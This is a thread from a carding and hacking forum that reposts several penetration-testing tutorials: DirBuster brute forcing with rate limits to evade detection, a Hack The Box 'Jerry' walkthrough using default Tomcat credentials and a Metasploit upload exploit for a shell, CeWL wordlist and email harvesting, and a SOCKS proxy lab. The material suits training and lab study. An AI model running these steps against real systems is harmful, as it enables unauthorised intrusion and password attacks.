[Guide] Comprehensive Guide on Dirbuster Tool

[Guide] Comprehensive Guide on Dirbuster Tool - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] Comprehensive Guide on Dirbuster Tool (/Thread-Guide-Comprehensive-Guide-on-Dirbuster-Tool)

[Guide] Comprehensive Guide on Dirbuster Tool - NINZA - 05-14-2020

In this article, we are focusing on the transient directory using Kali Linux tool Dibuster and trying to find hidden files and directories within a web server.
Table of Content

What is DirBuster
Default Mode
GET Request Method
Pure Brute Force (Numeric)
Single Sweep (Non-recursive)
Targeted Start
Blank Extensions
Search by File Type (.txt)
Changing the DIR List
Following Redirects
Attack Through Proxy
Adding File Extensions
Evading Detective Measures (Requests Per Second)

What is DirBuster
DirBuster is an application within the Kali arsenal that is designed to brute force web and application servers. The tool can brute force directories and files. The application lets users take advantage of multi-thread functionality to get things moving faster. In this article, we will give you an overview of the tool and its basic functions.
Default Mode
We start DirBuster and only input

[To see content please register here]

in the target URL field. Leave the rest of the options as they are. DirBuster will now auto switch between HEAD and GET requests to perform a list based brute force attack.
[Image: 1.png?w=687&ssl=1]

Let’s hit Start. DirBuster gets to work and starts brute forcing and we see various files and directories popping up in the result window.
[Image: 2.png?w=687&ssl=1]

GET Request Method
We will now set DirBuster to only use the GET request method. To make things go a little faster, the thread count is set to 200 and the “Go Faster” checkbox is checked.
[Image: 3.png?w=687&ssl=1]

In the Results – Tree View we can see findings.
[Image: 4.png?w=687&ssl=1]

Pure Brute Force (Numeric)
DirBuo performs step allows a lot of control over the attack process, in this set we will be using only numerals to perform a pure brute force attack. This is done by selecting “Pure Brute Force” in the scanning type option and selecting “0-9” in the charset drop-down menu. By default, the minimum and maximum character limit are set.
[Image: 5.png?w=687&ssl=1]

In the Results – Tree View we can see findings.
[Image: 6.png?w=687&ssl=1]

Single Sweep (Non-recursive)
We will now perform a single sweep brute force where the dictionary words are used only once. To achieve this, we will unselect the “Be Recursive” checkbox.
[Image: 7.png?w=687&ssl=1]

In the Results – ListView we can see findings.
[Image: 8.png?w=687&ssl=1]

Targeted Start
Further exploring the control options provided by DirBuster, we will set it up to start looking from the “admin” directory. In the “Dir to start with” field, type “/admin” and hit start.
[Image: 9.png?w=687&ssl=1]

In the Results – Tree View we can see findings.
[Image: 10.png?w=687&ssl=1]

Blank Extensions
DirBuster can also look into directories with a blank extension, this could potentially uncover data that might be otherwise left untouched. All we do is check the “Use Blank Extension” checkbox.
[Image: 11.png?w=687&ssl=1]

We can see the processing happen and DirBuster testing to find directories with blank extensions.
[Image: 12.png?w=687&ssl=1]

Search by File Type (.txt)
We will be setting the file extension type to .txt, by doing so, DirBuster will look specifically for files with a .txt extension. Type “.txt” in the File extension field and hit start.
[Image: 13.png?w=687&ssl=1]

We can see the processing happen and DirBuster testing to find directories with a .txt extension.
[Image: 14.png?w=687&ssl=1]

Changing the DIR List
We will now be changing the directory list in DirBuster. Options > Advanced Options > DirBuster Options > Dir list to use. Here is where we can browse and change the list to “directory-list-2.3-medium.txt”, found at /usr/share/dirbuster/wordlists/ in Kali.
[Image: 15.png?w=687&ssl=1]

We can see the word list is now set.
[Image: 16.png?w=687&ssl=1]

Following Redirects
DirBuster by default is not set to follow redirects during the attack, but we can enable this option under Options > Follow Redirects.
[Image: 17.1.png?w=687&ssl=1]

We can see the results in the scan information as the test progresses.
[Image: 17.png?w=687&ssl=1]

Results in the Tree View.
[Image: 18.png?w=687&ssl=1]

Attack through Proxy
DirBuster can also attack using a proxy. In this scenario, we try to open a webpage at 192.168.1.108 but are denied access.
[Image: 21.png?w=687&ssl=1]

We set the IP in DirBuster as the attack target.
[Image: 22.png?w=687&ssl=1]

Before we start the attack, we set up the proxy option under Options > Advance Options > Http Options. Here we check the “Run through a proxy” checkbox, input the IP 192.168.1.108 in the Host field and set the port to 3129.
[Image: 23.png?w=687&ssl=1]

We can see the test showing results.
[Image: 24.png?w=687&ssl=1]

Adding File Extensions
Some file extensions are not set to be searched for in DirBuster, mostly image formats. We can add these to be searched for by navigating to Options > Advanced Options > HTML Parsing Options.
[Image: 25.png?w=687&ssl=1]

We will delete jpeg in this instance and click OK.
[Image: 26.png?w=687&ssl=1]

In the File Extension filed we will type in “jpeg” to explicitly tell DirBuster to look for .jpeg format files.
[Image: 27.png?w=687&ssl=1]

We can see in the testing process, DirBuster is looking for and finding jpeg files.
[Image: 28.png?w=687&ssl=1]

Evading Detective Measures
Exceeding the warranted requests per second during an attack is a sure shot way to get flagged by any kind of detective measures put into place. DirBuster lets us control the requests per second to bypass this defense. Options > Advanced Options > Scan Options is where we can enable this setting.
[Image: 29.png?w=687&ssl=1]

We are setting Connection Time Out to 500, checking the Limit number of requests per second and setting that field to 20.
[Image: 30.png?w=687&ssl=1]

Once the test initiated, we will see the results. The scan was stopped to show the initial findings.
[Image: 31.png?w=687&ssl=1]

Once the scan is complete the actual findings can be seen.
[Image: 32.png?w=687&ssl=1]

We hope you enjoy using this tool. It is a great tool that’s a must in a pentester’s arsenal.
Stay tuned for more articles on the latest and greatest in hacking.

Hello CTF Crackers!! Today we are going to capture the flag on a Challenge named as “Jerry” which is available online for those who want to increase their skill in penetration testing and black box testing. Jerry is a retired vulnerable lab presented by ‘

[To see content please register here]

’ for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to expert level.
Level: Easy
Flags: There are two flags. (user.txt & root.txt)
IP Address: 10.10.10.95
Penetrating Methodologies

Port scanning and IP discovery
Browsing the IP on port 8080
Enumerating served webpage
Getting Login Credentials
Attacking using Metasploit
Getting root Access
Reading the flags

Walkthrough
Since these labs are available online via VPN therefore, they have a static IP Address. The IP Address of Jerry is 10.10.10.95
Let’s start off with scanning the network to find our target
nmap -sV 10.10.10.95
1
nmap -sV 10.10.10.95
[Image: 1.png?w=687&ssl=1]

So here, we notice very interesting result from nmap scan, it shows port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1
Next order of business is to browse the IP on a Web Browser.
[Image: 2.png?w=687&ssl=1]

On opening the IP on the Web Browser, we are greeted with the default TomCat page. After some enumeration here and there, we found the “Manager App” Link. Upon clicking this link, we are struck with a Login Form as shown below.
[Image: 3.png?w=687&ssl=1]

Here, after some tweaking with some passwords and other stuff, we found that clicking on “Cancel” Button triggers a 401 Error as shown in the image.
[Image: 4.png?w=687&ssl=1]

After closely reading the example on the webpage provided, we got the Login Credentials.
User: tomcat
Password: s3cret
1
2
User: tomcat
Password: s3cret
Its time to attack, using the Swiss knife of any penetration tester – “Metasploit”.
After doing some research and some tries, it was clear that we can use the tomcat_mgr_upload exploit.
So, let’s do this:
msf> use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.95
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
msf exploit(multi/http/tomcat_mgr_upload) > exploit
1
2
3
4
5
6
msf> use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.95
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
msf exploit(multi/http/tomcat_mgr_upload) > exploit
As shown in the image provided below, the exploit runs successfully and gives a meterpreter session with elevated privileges.
We traverse through the Directories to get flag using commands like “ls” and “cd”
[Image: 5.png?w=687&ssl=1]

After a little bit of enumeration, we get to the C:\Users directory. Here we come across the Administrator directory so we traverse to that directory. And the further we traverse to the Desktop directory.
This gives us the flags directory, which on opening gives us a text file named 2 for the price of 1. On opening, we get both the user and the root password.
[Image: 6.png?w=687&ssl=1]

Hello Friends!! In this article, we are focusing on Generating Wordlist using Kali Linux tool Cewl and learn more about its available options.
Table of Content

Introduction to Cewl
Default Method
Save Wordlist in a file
Generating Wordlist of Specific Length
Retrieving Emails from a Website
Count the number of Word Repeated in a website
Increase the Depth to Spider
Extra Debug Information
Verbose Mode
Generating Alpha-Numeric
Cewl with Digest/Basic Authentication
Proxy URL

Introduction to Cewl
CeWL is a ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. CeWL also has an associated command line app, FAB (Files Already Bagged) which uses the same metadata extraction techniques to create author/creator lists from already downloaded.
Source:

[To see content please register here]

Type “cewl -h” in the terminal, it will dump all the available options it accepts along with their respective description.
SYNTAX: cewl <url> [options]
General Options
-h, –help: Show help.
-k, –keep: Keep the downloaded file.
-d <x>,–depth <x>: Depth to spider to, default 2.
-m, –min_word_length: Minimum word length, default 3.
-o, –offsite: Let the spider visit other sites.
-w, –write: Write the output to the file.
-u, –ua <agent>: User agent to send.
-n, –no-words: Don’t output the wordlist.
–with-numbers: Accept words with numbers in as well as just letters
-a, –meta: include meta data.
–meta_file file: Output file for Meta data.
-e, –email: Include email addresses.
–email_file <file>: Output file for email addresses.
–meta-temp-dir <dir>: The temporary directory used by exiftool when parsing files, default /tmp.
-c, –count: Show the count for each word found.
-v, –verbose: Verbose.
–debug: Extra debug information
Authentication
–auth_type: Digest or basic.
–auth_user: Authentication username.
–auth_pass: Authentication password.
Proxy Support
–proxy_host: Proxy host.
–proxy_port: Proxy port, default 8080.
–proxy_username: Username for proxy, if required.
–proxy_password: Password for proxy, if required.
[Image: 1.png?w=687&ssl=1]

Default Method
Enter the following command which spiders the given URL to a specified depth and prints a list of words which can then be used as a dictionary for cracking the password.
cewl

[To see content please register here]

1
cewl

[To see content please register here]

Save Wordlist in a file
For the purpose of the record maintenance, better readability, and future references, we save the print list of the word onto a file. To this we will use the parameter -w to save the output in a text file.
cewl

[To see content please register here]

-w dict.txt
1
cewl

[To see content please register here]

-w dict.txt
Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file on not. In this case, our location for output is /root /dict.txt.
cat dict.txt
1
cat dict.txt
[Image: 3.png?w=687&ssl=1]

Generating Wordlist of Specific Length
If you want to generate a wordlist of a specific word length then use -m option as it enables minimum words to limit parameter.
cewl

[To see content please register here]

-m 9
1
cewl

[To see content please register here]

-m 9
The above command will generate a list of minimum 9 words, as you can observe in the following image, it has crawled to the given website and prints the list of the word with a minimum 9 characters.
[Image: 4.png?w=687&ssl=1]

Retrieving Emails from a Website
You can use -e option that enables email parameter along with -n option that hides the list of the word generated while crawling the given website.
cewl

[To see content please register here]

-n -e
1
cewl

[To see content please register here]

-n -e
As shown in the below image, it has successfully found 1 email-id from inside the website.
[Image: 5.png?w=687&ssl=1]

Count the number of Word Repeated in a website
If you want to count the number of words repeated several times in a website, then use -c options that enable count parameter.
cewl

[To see content please register here]

-c
1
cewl

[To see content please register here]

-c
As you can observe from the given below image that it has printed the count for each word which is repeated in the given website.
[Image: 6.png?w=687&ssl=1]

Increase the Depth to Spider
If you want to increase the level of spider for generating a larger list of the word by enumerating more new words from the website then use -d option along with depth level number that enables depth parameter for making more intense creeping. By Default it the depth level set is 2.
cewl

[To see content please register here]

-d 3
1
cewl

[To see content please register here]

-d 3

Extra Debug Information
You can use –debug option that enables debug mode and shows error and raw detail of website while crawling.
cewl

[To see content please register here]

--debug
1
cewl

[To see content please register here]

--debug

Verbose Mode
To expand the website crawling result and for retrieving completed detail of a website, you can use -v option for verbose mode. Rather than generating wordlist, it will dump the information available on the website.
cewl

[To see content please register here]

-v
1
cewl

[To see content please register here]

-v

Generating Alpha-Numeric
If you want to generate an alpha-numeric wordlist then you can use –with-numbers option along with the command.
cewl

[To see content please register here]

--with-numbers
1
cewl

[To see content please register here]

--with-numbers
[Image: 13.png?w=687&ssl=1]

From the given below image you can observe, this time it has generated an alpha-numeric wordlist.
[Image: 14.png?w=687&ssl=1]

Cewl with Digest/Basic Authentication
If there is page authentication for login into the website then above default will not work properly, in order to generate a wordlist you need to bypass the authentication page by using the following parameter:
–auth_type: Digest or basic.
–auth_user: Authentication username.
–auth_pass: Authentication password.
cewl

[To see content please register here]

--auth_type Digest --auth_user admin --auth_pass password -v
1
cewl

[To see content please register here]

--auth_type Digest --auth_user admin --auth_pass password -v
or
cewl

[To see content please register here]

--auth_type basic --auth_user admin --auth_pass password -v
1
cewl

[To see content please register here]

--auth_type basic --auth_user admin --auth_pass password -v
From the given below image you can observe, it has got HTTP-response 200 and hence generated the wordlist.
[Image: 15.png?w=687&ssl=1]

Proxy URL
When any website is running behind any proxy server then cewl will not able to generate wordlist with the help of default command as shown in the given below image.
cewl -w dict.txt

[To see content please register here]

1
cewl -w dict.txt

[To see content please register here]

You can use –proxy option to enable Proxy URL parameter to generate a wordlist with the help of the following command:
cewl --proxy_host 192.168.1.103 --proxy_port 3128 -w dict.txt

[To see content please register here]

1
cewl --proxy_host 192.168.1.103 --proxy_port 3128 -w dict.txt

[To see content please register here]

As you can observe in the given below image after executing the 2nd command, it has successfully printed the list of the word as an output result.
[Image: 17.png?w=687&ssl=1]

Hello friends!! In our previous article we have discussed “

[To see content please register here]

” and today’s article we are going to set up SOCKS Proxy to use it as a Proxy Server on Ubuntu/Debian machines and will try to penetrate it.
Table of Content

Introduction to proxy
What is socks proxy
Difference Between Socks proxy and HTTP Proxy
Socks proxy Installation
Connecting HTTP via Proxy
Connecting SSH via Proxy
Connecting FTP via Proxy

Introduction to Proxy
A proxy is a computer system or program that acts as a kind of middle-man or an intermediary to come between your web browser and another computer. Your ISP operates servers– computers designed to deliver information to other computers. It uses proxy servers to accelerate the transfer of information between the server and your computer.
For Example, Two users say A and B both have requested to access the same website of the server then Instead of retrieving the data from the original server, the proxy has “stored or cached” a copy of that site and sends it to User A without troubling the main server.
What is SOCKS Proxy?
A SOCKS server is an all-purpose proxy server that creates a TCP connection to another server on the client’s behalf, then exchanges network packets between a client and server. The Tor onion proxy software serves a SOCKS interface to its clients. Even SSH tunnel makes all the connections as per the SOCKS protocol.
For high security, you can go with SOCKS5 protocol that provides various authentication options which you cannot get with the SOCKS4 protocol.
Difference Between Socks proxy and HTTP Proxy

SOCKS Proxy is low-level which is designed to be a general proxy that will be able to accommodate effectively any protocol, program, or type of traffic.
SOCKS proxies support both TCP and UDP transfer protocols
SOCKS performs at Layer 5 of the OSI model SOCKS server
Accepts an incoming client connection on TCP port 1080.
HTTP proxies proxy HTTP requests, while SOCKS proxies proxy socket connections
HTTP proxies are High-Level which are designed for a specific protocol.
HTTP proxies can only process requests from applications that use the HTTP protocol.
An HTTP proxy is for proxying HTTP or web traffic at layer 7
Accepts an incoming client connection on HTTP port 3128.

Socks Proxy Installation
For socks proxy lab set-up we are going to download microsocks through GitHub. MicroSocks is multithreaded, small, efficient SOCKS5 server. It’s very lightweight, and very light on resources too. Even for every client, a thread with a stack size of 8KB is spawned.
Let’s start!!
Open the terminal with sudo rights and enter the following command:
git clone

[To see content please register here]

1
git clone

[To see content please register here]

Once downloading is completed run the following command for its installation:
cd microsocks
apt install gcc
make
make install
1
2
3
4
cd microsocks
apt install gcc
make
make install
[Image: 2.png?w=687]

Now execute the following command to run socks proxy on port 1080 without authentication.
microsocks -p 1080
1
microsocks -p 1080
[Image: 3.png?w=687]

As you can observe FTP, SSH, HTTP and Socks are running in our local machine and now let’s go for socks penetration testing on a various protocol to ensure whether it is an all-purpose program or not as said above.
Connecting HTTP via Proxy
Now Configuring Apache service for Web Proxy, therefore, open the “000-default.conf” file from the path: /etc/apache2/sites-available/ and add following line to implement the following rules on /html directory over localhost or Machine IP (192.168.1.103).
<Directory /var/www/html/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order deny,allow
deny from all
allow from 127.0.0.1 192.168.1.103
</Directory>
1
2
3
4
5
6
7
<Directory /var/www/html/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order deny,allow
deny from all
allow from 127.0.0.1 192.168.1.103
</Directory>
Now the save the file and restart the apache service with the help of the following command.
service apache2 start
1
service apache2 start
[Image: 5.png?w=687]

Now when someone tries to access web services through our network i.e. 192.168.1.103, he/she will welcome by following web page
“Error 403 forbidden You don’t have permission to access <requested page>”.
When you face that such type of situation where port 80 is open but you are unable to access it, hence proved the network is running behind a proxy server.
[Image: 6.png?w=687]

For web Proxy penetration testing we had already set-up lab for web application server such as DVWA (Read Article from

[To see content please register here]

).
Now to test whether our proxy server is working or not by configuring , let’s open Firefox and go to Edit –> Preferences –> Advanced –> Network –> Settings and then select “Manual proxy configuration” and enter SOCKS proxy server IP address (192.168.1.103) and Port (1080) to be used for all protocol.
[Image: 7.png?w=687]

BOOMMM!! Connected to the Proxy server successfully using HTTP Proxy in our Browser.
[Image: 8.png?w=687]

Connecting SSH via Proxy
Now configuring host.allow file for SSH Proxy, therefore, open /etc/hosts.allow file and following line to allow SSH connection on localhost IP and restrict for others.
sshd : localhost : allow
sshd : 192.168.1.103 : allow
sshd : ALL : deny
1
2
3
sshd : localhost : allow
sshd : 192.168.1.103 : allow
sshd : ALL : deny
[Image: 9.1.png?w=687]

Now open a proxychains configuration file from the given path /etc/proxychains.conf in your Kali Linux and then add the following line at the bottom.
socks5 192.168.1.103 1080
1
socks5 192.168.1.103 1080
[Image: 9.png?w=687]

Now when we try to connect with target machine via port 22 for SSH connection we got an error message “Connection reset by peer” as shown in below image after executing the 1st command.
ssh [email protected]
1
ssh [email protected]
When you face that such type of situation where port 22 is open but you are unable to access it, hence proved the network is running behind the proxy server.
But if you will use proxychains along with the command after saving the configuration as said above then you can easily connect with target network via port 22 for ssh connection as shown in below image after executing the 2nd command.
proxychains ssh [email protected]
1
proxychains ssh [email protected]
[Image: 10.png?w=687]

Connecting FTP via Proxy
For connecting FTP via proxy, we have used PRO FTP. SO, you can install it using the following command :
apt-get install proftpd
1
apt-get install proftpd
Now configuring vsftpd.conf file for FTP Proxy therefore open /etc/proftpd/proftpd.conf file and add the following line to allow FTP connection on localhost IP and restrict for other networks.
<Limit LOGIN>
Order Allow,Deny
Allow from 127.0.0.1 192.168.1.103
Deny from all
</Limit>
1
2
3
4
5
<Limit LOGIN>
Order Allow,Deny
Allow from 127.0.0.1 192.168.1.103
Deny from all
</Limit>
[Image: 11.png?w=687]

Using FileZilla when we try to connect 192.168.1.103 via port 21 for accessing FTP service, we got an Error “Connection closed by server”.
When you face that such type of situation where port 21 is open but you are unable to access it, hence proved the network is running behind a proxy server.
[Image: 12.1.png?w=687]

But FileZilla has multi features as it offers a generic proxy option that forced passive mode on FTP connection. Go to Settings > Connection > FTP and select “generic proxy” option and made the following configuration settings.

Choose SOCKS 5 as generic Proxy
Proxy HOST IP: 192.168.1.103
Proxy Port: 1080

Now again when you will try to connect the target machine via port 21 for accessing FTP service then you will be easily able to access it as shown in the last image.
Hence Proved the SOCKS is actually an all-purpose proxy server and Hopefully, you have found this article very helpful and completely understood the working of Proxy server and another related topic cover in this article.
[Image: 15.png?w=687]